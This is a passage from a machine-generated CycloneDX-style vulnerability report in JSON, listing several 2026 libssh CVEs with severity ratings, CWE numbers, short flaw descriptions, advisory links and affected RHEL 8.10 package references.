          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59845",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        390
      ],
      "description": "A flaw was found in libssh. When ProxyCommand is used, an unchecked fork() failure can be stored as process ID -1; during cleanup, signals may then be sent across the caller's accessible process tree, leading to local denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59845"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59845"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498178"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59845.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59845"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59845"
        }
      ],
      "published": "2026-07-21T12:18:58+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59846",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        78,
        77
      ],
      "description": "A flaw was found in libssh. A malicious username expanded through %r in ProxyCommand handling can inject shell metacharacters, exposing environment variables and causing unintended shell behavior.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59846"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498179"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59846.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59846"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59846"
        }
      ],
      "published": "2026-07-21T13:17:18+00:00",
      "updated": "2026-08-19T05:17:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59847",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        253,
        1310
      ],
      "description": "A flaw was found in libssh. Incorrect AES-GCM finalization checks in builds using the OpenSSL backend can effectively remove integrity protection, allowing an in-path attacker to modify plaintext on the wire without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59847"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498180"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59847.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59847"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59847"
        }
      ],
      "published": "2026-07-21T14:16:34+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
